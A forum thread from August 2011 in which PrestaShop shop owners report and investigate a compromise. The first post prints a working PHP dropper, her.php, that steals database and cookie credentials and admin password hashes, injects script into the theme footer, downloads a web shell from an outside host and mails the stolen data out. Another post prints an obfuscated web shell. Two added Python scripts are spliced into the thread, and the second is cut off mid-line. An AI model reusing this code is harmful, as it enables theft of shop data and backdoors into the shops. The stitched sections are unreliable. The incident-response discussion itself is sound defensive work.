Muller Posted August 23, 2011

Hi all, I use an SCM system, I was just about to commit some files when I see in the "unversioned" list of files a new file which I did not remember creating. It's called "her.php" and it sits under the modules directory. So I opened it with a php editor, and here is the content:

    <?php
    error_reporting(0);
    $shcode = "{literal}".base64_decode("[encoded payload removed]")."{/literal}";
    $shurl = "http://www.c2bill.it/stest/chkpnt/shell.txt";
    $msgurl = "http://www.c2bill.it/stest/chkpnt/sdata.php";
    $mails = "[email protected], [email protected]";
    function deletedir($arg){
        $d=opendir($arg);
        while($f=readdir($d)){
            if($f!="."&&$f!=".."){
                if(is_dir($arg."/".$f)) deletedir($arg."/".$f);
                else unlink($arg."/".$f);
            }
        }
        rmdir($arg);closedir($d);
    }
    @include("../config/settings.inc.php");
    ///Host info
    $hostvar = "host:".$_SERVER["HTTP_HOST"]."\n"."ref:".$_SERVER["HTTP_REFERER"]."\n"."path:".$_SERVER["SCRIPT_FILENAME"]."\n=====\n";
    ///Server info
    $srvvar = _DB_SERVER_."\n"._DB_USER_."\n"._DB_PASSWD_."\n"._DB_NAME_."\n"._DB_PREFIX_."\n"._COOKIE_KEY_."\n"._COOKIE_IV_."\n"._PS_VERSION_."\n=====\n";
    ///GET admin
    mysql_connect(_DB_SERVER_,_DB_USER_,_DB_PASSWD_);
    mysql_selectdb(_DB_NAME_);
    $r = mysql_query("SELECT `email`, `passwd` FROM `"._DB_PREFIX_."employee` WHERE id_profile = 1");
    while($ro=mysql_fetch_assoc($r)){$usrs .= $ro['email'].":".$ro['passwd']."\n";}
    //Wride sploit
    @deletedir("../tools/smarty/compile/");
    @deletedir("../tools/smarty/cache/");
    @deletedir("../tools/smarty_v2/");
    @deletedir("../tools/smarty_v2/");
    $fn = "../themes/"._THEME_NAME_."/footer.tpl";
    $f = fopen($fn,"r");$ff = fread($f,filesize($fn));fclose($f);
    $ff = str_replace("</body>"," ".$shcode."</body>",$ff);
    $f = fopen($fn,"w");$rf = fwrite($f,$ff);fclose($f);
    if($rf>0) $wrres = "true"; else $wrres = "false";
    //write shell
    $sh = file_get_contents($shurl);
    $shf = "../upload/".md5(date("r")).".php";
    $f = fopen($shf,"w");$rf = fwrite($f,$sh);fclose($f);
    $shf2 = "../download/".md5(date("r")).".php";
    $f = fopen($shf2,"w");$rf = fwrite($f,$sh);fclose($f);
    @unlink("../download/.htaccess");
    $msg = $hostvar.$srvvar.$usrs."=====\nTemplate writed:".$wrres."\n=====\nShells:\n".$shf."\n".$shf2."\n=====\n";
    @mail($mails,"new shop",$msg);
    @file_get_contents($msgurl."?data=".base64_encode($msg));
    @unlink(__FILE__);
    ?>

That looks like they're emailing all the back office user/passwords to the two emails specified at the top of the code. Did someone hack into my computer and put this file there? What do you think guys? I'm running an anti-virus check obviously as I write this...

Burhan BVK Posted August 23, 2011

Weird, I had the same file, created today. It could be a new exploit or a timed virus that downloads this file on a given day. This is definitely created specifically for prestashop.

You should check your upload and download directories for php files, that are not named index.php. You should check your theme folder, footer.tpl file. It might have some new javascript at the end.

This file does send the username and passwords of employees. But that is useless, the passwords are hashed so you can not use them for login. But it also sends your database user name and password. You might want to change them just in case. If your mysql server is accessible externally they will be able to login.

Muller Posted August 23, 2011 (Author)

Thanks. I posted this on Reddit at: I'm getting help there. I discovered new files in the download and upload directory, as well as modifications in my theme's footer.tpl which I deleted. The file was only run on my localhost, not on the live server.

Maxence de Flotte Posted August 23, 2011

Hi, What is your hosting service? What is the ftp manager you used? (FileZilla?) Was this file on local? Best regards,

Muller Posted August 23, 2011 (Author)

The file was not placed on the live server, only on my local machine. I'm running 1.4.3.0. Please go to the link I posted in my previous reply to Reddit.com, as some guys helped there finding out what the script actually does. The question is how it happened, and how we stop it from happening again.

ruilong Posted August 23, 2011

I have seen the same thing on another shop today. Can you give us a list of 3rd party modules you use in your shop, and I can see if the same modules are used in the affected shop I found.

Muller Posted August 23, 2011 (Author)

> I have seen the same thing on another shop today. Can you give us a list of 3rd party modules you use in your shop, and I can see if the same modules are used in the affected shop I found.

The only modules I use are the ones that came with 1.4.3.0. The only module I downloaded from prestashop.com is their own authorize.net SIM module. That's the only module I installed that did not come with Prestashop already.

FlyHigh Posted August 23, 2011

I just started using PrestaShop a few days ago to discover what's it all about - It works great, despite the hack today:
* working on an online server, the public_html was protected by .htaccess (this protection was disabled when I found out about it).
* I can't find her.php on the server anymore (in the apache-log I can see it)

Is there any more information I can give to help find out what caused this?
* PrestaShop: 1.4.4.0
* Theme: Matrice

Mike Kranzler Posted August 23, 2011

Hi Muller,

First of all, I want to let you know that we take this sort of situation extremely seriously, and have already assigned it as the top priority to our most qualified developer, Maxence (who as you can see, is already on the case). He is investigating it to try to locate the source, even if it is from an external module. If you would like to speak with him directly, we invite you to MP him to give him any additional information that could be helpful.

I will let you know as soon as I receive more news, but please just know that we are working very hard to ensure that this will not happen again, not to you or anyone else in the PrestaShop community.

-Mike

thehandlestudio Posted August 23, 2011

I have also had the same thing happen tonight about 1 hour ago and I am looking for the source. I think hta access files have been added as well as a script in the download folder but I can't open it. Regards, Mark.

Mike Kranzler Posted August 23, 2011

We're working to find the solution for you, but in the meantime, you may want to check the suggestions posted on the reddit link that Muller posted near the top. Take those suggestions with a grain of salt, but they may be worth exploring on your local machine after a back-up.

-Mike

FlyHigh Posted August 23, 2011

I've checked the Apache Usage logs, couldn't find another IP address than mine. There was a GET command to her.php

    ... [23/Aug/2011:17:44:21 +0200] "GET /modules/her.php HTTP/1.1" 200 304 ...

In Download & Upload is a new file named: f48be302135d80a289c0e56fae37952e.php

These files are also dated 23/aug 17:44 - the same time footer.tpl changed. Did it happen at the same time for everyone?

designguy79 Posted August 23, 2011

This also happened to me, running 1.4.3. I couldn't find the "her.php" but my footer.tpl was definitely changed. The only 3rd party module I had installed was jbx_menu. Did anyone else have this happen while running 1.4.4?

kapowchis Posted August 23, 2011

Also happening in 1.4.4

designguy79 Posted August 23, 2011

Dang it, I hope they can find the source of the problem soon. Just launched the site live, otherwise I would take it down. Might have to anyway! Also, I am not familiar with the correct PrestaShop .htaccess file. How do I know what to remove from there? (I have cleaned everything else up)

AKJV Posted August 23, 2011

Wow, this looks serious. I discovered today that I have the same issue. I thought that I was the only one with a compromised Prestashop installation, till I read this topic. I'm running a 1.4.4 version, updated from 1.4.3.

Today, I saw that my FO was messed up: the Category block was empty, my slideshow stopped working and the footer has shifted upwards. When I use Firebug to check the html rendered code, I saw links to 2 external sites. I'm afraid I don't remember anymore which sites those were linking to...

I checked my footer.tpl and found weird and suspicious code at the bottom. In addition, php files were added to the /upload and /download folders. Also, the .htaccess file (to deny access) in the /download folder was gone.

In my case, this happened right after I've uploaded an html email file to my /mails/xx folder. This file was from someone else on the forum who I'm helping with an email layout problem. So my initial reaction was that this HTML file was somehow infected but seeing similar issues with others, I wonder if that's the case...

I've attached both footer.tpl (with just the weird code) and one of added php files so the developers can have a look at it.

compromised.zip

Rolo Tomasi Posted August 23, 2011

I'm running 1.4.4 and my site went down at 2:00pm UK time. My webhost has just pointed me to this thread and I have the same files added to my upload and download folders along with the addition to the footer.tpl file.

kapowchis Posted August 23, 2011

The footer.tpl file and a file named menu.3 within the "cache" folder from the "jbx_menu" module were modified at the same time, so I don't know if that's relevant or not.

AKJV Posted August 23, 2011

I'm using jbx_menu as well... Can all the people who have posted here and encountered the same problem confirm that they are using this menu?

Burhan BVK Posted August 23, 2011

For anyone who finds a her.php file under their modules directory, you should do the following:
- Check the file creation time, write this down and delete the file from your server.
- Go to your apache raw access logs. You should be able to access it using hosting control panel.
- Find the line that corresponds to the file creation time you wrote down earlier.
- Copy the section starting 5 minutes before to 5 minutes after. Save it in a text file and share it here.

This data would help identify the root of the problem.

To see if you have been attacked, check the following:
- Is there any php file under your uploads or downloads directory apart from index.php?
- Is there a strange javascript at the end of your footer.tpl file?

If any of the above happens, change your mysql username and password.

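The checks from the post above, written as a Python script (an added example, not code from the thread or from PrestaShop). It assumes Apache's standard `[dd/Mon/yyyy:hh:mm:ss +zzzz]` log timestamp, uses file modification time where the post says creation time, and treats a `{/literal}` directly before `</body>` in `themes/*/footer.tpl` as the injection marker, based on the her.php code at the top of the thread; the sample tree and log lines are constructed.

```python
import re
import tempfile
from datetime import datetime, timedelta, timezone
from pathlib import Path

# Apache access-log timestamp, e.g. [23/Aug/2011:17:44:21 +0200]
LOG_TS = re.compile(r"\[(\d{2}/[A-Za-z]{3}/\d{4}:\d{2}:\d{2}:\d{2} [+-]\d{4})\]")
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"
# her.php rewrites "</body>" to " {literal}...{/literal}</body>", so a
# {/literal} directly before </body> is a heuristic hit to review by hand.
INJECTED = re.compile(r"\{/literal\}\s*</body>", re.IGNORECASE)


def log_window(lines, event_time, minutes=5):
    """Return the access-log lines within +/- `minutes` of `event_time`."""
    delta = timedelta(minutes=minutes)
    hits = []
    for line in lines:
        match = LOG_TS.search(line)
        if not match:
            continue  # no timestamp: skip rather than guess
        try:
            stamp = datetime.strptime(match.group(1), TS_FORMAT)
        except ValueError:
            continue  # malformed date, e.g. an unknown month name
        if abs(stamp - event_time) <= delta:
            hits.append(line.rstrip("\n"))
    return hits


def scan_shop(root):
    """Return (kind, relative path, mtime) for each artifact named in the thread."""
    root = Path(root)
    found = []

    def record(kind, path):
        mtime = None  # stays None for "missing file" findings
        if path.exists():
            mtime = datetime.fromtimestamp(path.stat().st_mtime, timezone.utc)
        found.append((kind, path.relative_to(root).as_posix(), mtime))

    dropper = root / "modules" / "her.php"
    if dropper.is_file():  # often already gone: the script deletes itself
        record("dropper", dropper)
    for name in ("upload", "download"):
        folder = root / name
        if not folder.is_dir():
            continue
        for path in sorted(folder.iterdir()):
            if path.suffix.lower() == ".php" and path.name != "index.php":
                record("unexpected-php", path)
    htaccess = root / "download" / ".htaccess"
    if (root / "download").is_dir() and not htaccess.is_file():
        record("htaccess-missing", htaccess)
    for footer in sorted(root.glob("themes/*/footer.tpl")):
        if INJECTED.search(footer.read_text(errors="replace")):
            record("footer-injected", footer)
    return found


def demo():
    """Run both checks on constructed sample data (not real incident data)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for folder in ("modules", "upload", "download", "themes/sample"):
            (root / folder).mkdir(parents=True)
        (root / "upload" / "index.php").write_text("<?php // stock file\n")
        (root / "download" / "index.php").write_text("<?php // stock file\n")
        # Constructed stand-ins for the files reported in the thread.
        (root / "upload" / "0123456789abcdef0123456789abcdef.php").write_text("placeholder\n")
        (root / "themes" / "sample" / "footer.tpl").write_text(
            "</div> {literal}<script>/* placeholder */</script>{/literal}</body></html>\n"
        )
        findings = [(kind, rel) for kind, rel, _ in scan_shop(root)]

    sample_log = [  # constructed lines; 192.0.2.10 is a documentation address
        '192.0.2.10 - - [23/Aug/2011:17:30:00 +0200] "GET /index.php HTTP/1.1" 200 5120',
        '192.0.2.10 - - [23/Aug/2011:17:41:05 +0200] "GET /category.php HTTP/1.1" 200 812',
        '192.0.2.10 - - [23/Aug/2011:17:44:21 +0200] "GET /modules/her.php HTTP/1.1" 200 304',
        '192.0.2.10 - - [23/Aug/2011:17:52:00 +0200] "GET /index.php HTTP/1.1" 200 5120',
        "not an access-log line",
    ]
    event = datetime(2011, 8, 23, 17, 44, 21, tzinfo=timezone(timedelta(hours=2)))
    return findings, log_window(sample_log, event)


if __name__ == "__main__":
    results, window = demo()
    for kind, rel in results:
        print(f"{kind:18} {rel}")
    print("\n".join(window))
```

On a real shop, call `scan_shop()` on the PrestaShop root and pass the modification time of any hit to `log_window()` together with the raw access log.
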
thehandlestudio Posted August 23, 2011

I am not using that menu

Rolo Tomasi Posted August 23, 2011

I'm not using the jbx_menu module

FlyHigh Posted August 23, 2011

I'm not using JBX_menu! Strange thing is: I can't find anything in the log files about the new files created in the download and upload directory...

AKJV Posted August 23, 2011

Ok, at least we can rule out the jbx_menu as the source of the problem... Two more things.

First, I didn't see a her.php file in my modules folder but still had the infected footer.tpl and the suspicious php files in upload and download folders.

Second, I had a quick look at my downloaded PS 1.4.4 file (from the Prestashop website) and found a .DS_Store file in the root folder. If my memory serves me well, this is a (hidden) archive file from MacOS systems. This file was thus also present on my server installation during my upgrade process. Probably not related to the issue but still worth mentioning it.

geckoinfo Posted August 23, 2011

Same thing for me.... I'm not using jbx_menu but JBSlider and JBVariousLinks. Prestashop 1.4.3 and same files in upload, download and code in footer.tpl into my theme folder. SQL password changed... and wait...

FlyHigh Posted August 23, 2011

The .DS_store is indeed from Mac, has probably nothing to do with the problem.

About her.php: The file is automatically deleted, the TS was lucky to see it in time... Still: shouldn't you see every action in the apache log files? Like the creation of her.php, I can't find this. Or do you need different logfiles for this? (don't know much about those log files)

aure58 Posted August 23, 2011

Same things for me. I use PS 1.4.4, in local server (not live server) and code has been added in my theme footer.php

Rolo Tomasi Posted August 23, 2011

I have just checked a second store I run and this has not been affected by this issue. I haven't got round to upgrading this store yet so it is still running version 1.3.7. It appears the issue only affects version 1.4.

geckoinfo Posted August 23, 2011

No problem in my other store in Prestashop 1.3.5

toktokcity Posted August 23, 2011

Same problem in prestashop 1.4.4 with Matrice. This code was added.

    <?php
    if (isset($_GET['session2'])){
    $auth_pass = "fa816edb83e95bf0c8da580bdfd491ef";
    $color = "#df5";
    $default_action = 'FilesMan';
    $default_use_ajax = true;
    $default_charset = 'Windows-1251';
    preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'[base64-encoded payload omitted]
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
[remainder of the base64-encoded payload removed]'\x29\x29\x29\x3B",".");}?>

    <?php
    // Echoes the request's client and proxy headers, POST data and cookies back inside a <pre> block.
    error_reporting(0);
    $empty = "";
    function filt($data) {
        if (is_array($data)){
            $datanew = "";
            foreach ($data as $key=>$val) {
                $datanew .= htmlspecialchars(stripslashes($key)."=".stripslashes($val))."&";
            }
        } else {
            $datanew = $data;
            $datanew = htmlspecialchars(stripslashes($datanew));
        }
        return $datanew;
    }
    if(isset($_SERVER['HTTP_FORWARDED_FOR'])) $DATA_HTTP_FORWARDED_FOR=filt($_SERVER['HTTP_FORWARDED_FOR']); else $DATA_HTTP_FORWARDED_FOR=$empty;
    if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])) $DATA_HTTP_X_FORWARDED_FOR=filt($_SERVER['HTTP_X_FORWARDED_FOR']); else $DATA_HTTP_X_FORWARDED_FOR=$empty;
    if(isset($_SERVER['HTTP_FROM'])) $DATA_HTTP_FROM=filt($_SERVER['HTTP_FROM']); else $DATA_HTTP_FROM=$empty;
    if(isset($_SERVER['HTTP_CLIENT_IP'])) $DATA_HTTP_CLIENT_IP=filt($_SERVER['HTTP_CLIENT_IP']); else $DATA_HTTP_CLIENT_IP=$empty;
    if(isset($_SERVER['HTTP_HTTP_VIA'])) $DATA_HTTP_HTTP_VIA=filt($_SERVER['HTTP_HTTP_VIA']); else $DATA_HTTP_HTTP_VIA=$empty;
    if(isset($_SERVER['HTTP_XROXY_CONNECTION'])) $DATA_HTTP_XROXY_CONNECTION=filt($_SERVER['HTTP_XROXY_CONNECTION']); else $DATA_HTTP_XROXY_CONNECTION=$empty;
    if(isset($_SERVER['HTTP_PROXY_CONNECTION'])) $DATA_HTTP_PROXY_CONNECTION=filt($_SERVER['HTTP_PROXY_CONNECTION']); else $DATA_HTTP_PROXY_CONNECTION=$empty;
    if(isset($_SERVER['HTTP_PROXY_USER'])) $DATA_HTTP_PROXY_USER=filt($_SERVER['HTTP_PROXY_USER']); else $DATA_HTTP_PROXY_USER=$empty;
    if(isset($_SERVER['HTTP_PC_REMOTE_ADDR'])) $DATA_HTTP_PC_REMOTE_ADDR=filt($_SERVER['HTTP_PC_REMOTE_ADDR']); else $DATA_HTTP_PC_REMOTE_ADDR=$empty;
    if(isset($_SERVER['HTTP_X_REMOTECLIENT_IP'])) $DATA_HTTP_X_REMOTECLIENT_IP=filt($_SERVER['HTTP_X_REMOTECLIENT_IP']); else $DATA_HTTP_X_REMOTECLIENT_IP=$empty;
    if(isset($_SERVER['HTTP_PROXY_PORT'])) $DATA_HTTP_PROXY_PORT=filt($_SERVER['HTTP_PROXY_PORT']); else $DATA_HTTP_PROXY_PORT=$empty;
    if(isset($_SERVER['HTTP_USER_AGENT'])) $DATA_HTTP_USER_AGENT=filt($_SERVER['HTTP_USER_AGENT']); else $DATA_HTTP_USER_AGENT=$empty;
    if(isset($_SERVER['HTTP_REFERER'])) $DATA_HTTP_REFERER=filt($_SERVER['HTTP_REFERER']); else $DATA_HTTP_REFERER=$empty;
    if(isset($_SERVER['HTTP_ACCEPT'])) $DATA_HTTP_ACCEPT=filt($_SERVER['HTTP_ACCEPT']); else $DATA_HTTP_ACCEPT=$empty;
    if(isset($_SERVER['HTTP_CONNECTION'])) $DATA_HTTP_CONNECTION=filt($_SERVER['HTTP_CONNECTION']); else $DATA_HTTP_CONNECTION=$empty;
    if(isset($_SERVER['GATEWAY_INTERFACE'])) $DATA_GATEWAY_INTERFACE=filt($_SERVER['GATEWAY_INTERFACE']); else $DATA_GATEWAY_INTERFACE=$empty;
    if(isset($_SERVER['REQUEST_METHOD'])) $DATA_REQUEST_METHOD=filt($_SERVER['REQUEST_METHOD']); else $DATA_REQUEST_METHOD=$empty;
    if(isset($_COOKIE)) $_COOKIE=filt($_COOKIE); else $_COOKIE=$empty;
    if(isset($_POST)) $_POST=filt($_POST); else $_POST=$empty;
    $data = "<pre>REQUEST_INFO_PAGE_4896485_CODE REMOTE_ADDR=".filt($_SERVER['REMOTE_ADDR'])
        ." HTTP_CLIENT_IP=".$DATA_HTTP_CLIENT_IP
        ." HTTP_X_FORWARDED_FOR=".$DATA_HTTP_X_FORWARDED_FOR
        ." HTTP_X_FORWARDED=".$DATA_HTTP_FORWARDED_FOR
        ." HTTP_X_COMING_FROM= HTTP_FORWARDED_FOR=".$DATA_HTTP_FORWARDED_FOR
        ." HTTP_FORWARDED= HTTP_COMING_FROM= HTTP_VIA=".$DATA_HTTP_HTTP_VIA
        ." HTTP_XROXY_CONNECTION=".$DATA_HTTP_XROXY_CONNECTION
        ." HTTP_PROXY_CONNECTION=".$DATA_HTTP_PROXY_CONNECTION
        ." HTTP_USER_AGENT=".$DATA_HTTP_USER_AGENT
        ." HTTP_ACCEPT=".$DATA_HTTP_ACCEPT
        ." HTTP_CONNECTION=".$DATA_HTTP_CONNECTION
        ." GATEWAY_INTERFACE=".$DATA_GATEWAY_INTERFACE
        ." REQUEST_METHOD=".$DATA_REQUEST_METHOD
        ." HTTP_REFERER=".$DATA_HTTP_REFERER
        ." POST=".$_POST
        ." COOKIE=".$_COOKIE
        ." </pre> ";
    echo $data;
    ?>
plwm Posted August 23, 2011

Hi, Same problem in 1.4.4 on a local install of prestashop. My apache shows that the her.php file appeared just after a series of admin actions. Here are the last:

127.0.0.1 - - [23/Aug/2011:23:27:54 +0200] "POST [...my_local_admin]/ajax.php HTTP/1.1" 200 - "http://localhost/[...my_local_admin]/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"
127.0.0.1 - - [23/Aug/2011:23:27:58 +0200] "POST [...my_local_admin]/ajax.php?toggleScreencast HTTP/1.1" 200 - "http://localhost/[...my_local_admin]/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"
127.0.0.1 - - [23/Aug/2011:23:27:55 +0200] "POST /[...my_local_admin]/index.php?tab=AdminModules&token=c76a0756b0d565653ca9aabf3e5a35e HTTP/1.1" 200 301411 "http://localhost/[...my_local_admin]/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"

---- and now the her php file------

127.0.0.1 - - [23/Aug/2011:23:27:59 +0200] "GET /[...my_local_module_folder]/her.php HTTP/1.1" 200 - "http://localhost/_____Gedone/_Cap_Expresso/html/www2.capexpresso.com/admincap/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"

But I can't find her.php in my modules folder... And now my IE (that I rarely open) opens itself on http://ads.eorezo.com/cgi-bin/advert/getads?x_......

My two other sites (1.3.6 not upgraded to 1.4) on online servers don't seem to be affected by this problem...
hege Posted August 23, 2011

same problem:
- e66943f1495e1631affdbddae8398209.php file in the download and upload folder
- script in the footer.tpl

My shop ver is 1.4.2.5. Is there any modification that I have to check? If you find the solution for this hack, please tell us how we can protect the site not with just a new release (it is not possible for me to update to a newer release).

regards, Gabor
SonnyBoyII Posted August 23, 2011

Same problem... interesting thing is I have a few prestashops on my server in the same, root directory but in different folders, just one of these was attacked (PS.1.4.3)...
ct1976 Posted August 23, 2011

Would you advise going back to an older version?

- replaced footer.tpl
- removed several dodgy looking image files for house, pharmacy, car sales in Modules\avoir\ folder??!!
- index.php had been amended
- smarty.v2 removed and now reinstated
SonnyBoyII Posted August 23, 2011

I forgot to mention, it happened to me before, a month ago! I restored the whole shop and database. Unfortunately, I didn't check if there is any strange additional file or modification or not.
AKJV Posted August 24, 2011

I did check for other added or modified files when I discovered the hack, by searching for all files with a recent timestamp. The only, apparent, changes I could find have already been reported in this topic. In short, these are the changes:

1) a script is added to the footer.tpl file in the active theme folder
2) a php file is created in both /upload and /download folders
3) .htaccess file in /download folder is deleted
4) tools/smarty/compile, tools/smarty/cache and tools/smarty_v2 are deleted (I haven't checked this myself)
5) if you're lucky enough to catch it, there is a her.php file in your /modules folder. But this file deletes itself after the hack attempt.

I would advise to check all this in your own installation and if needed restore a backup of your footer.tpl, delete the alien php files, restore .htaccess file in /download folder (not necessary if this folder is empty) and restore the smarty folders.

In addition, it is also important to change your password for access of your BO (though I think this info is sent encrypted to the hackers but just to be safe) and to change the username/password of your database access (and change this in your BO accordingly). Also, recompile and clear the cache (enable 'Force compile' and disable 'Cache' in your 'Preferences' tab in your BO and do a refresh of your website; don't forget to revert the settings afterwards).

And hopefully the Prestashop developers will find out the source of all this quickly.
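The five changes listed in the post above can be checked mechanically across several installations. The following Python script is an added example, not part of the original thread or of PrestaShop; the function names, the `{/literal}`-directly-before-`</body>` heuristic (derived from the `str_replace` call in the her.php listing) and the sample directory tree are assumptions constructed for illustration.

```python
import hashlib
import re
import tempfile
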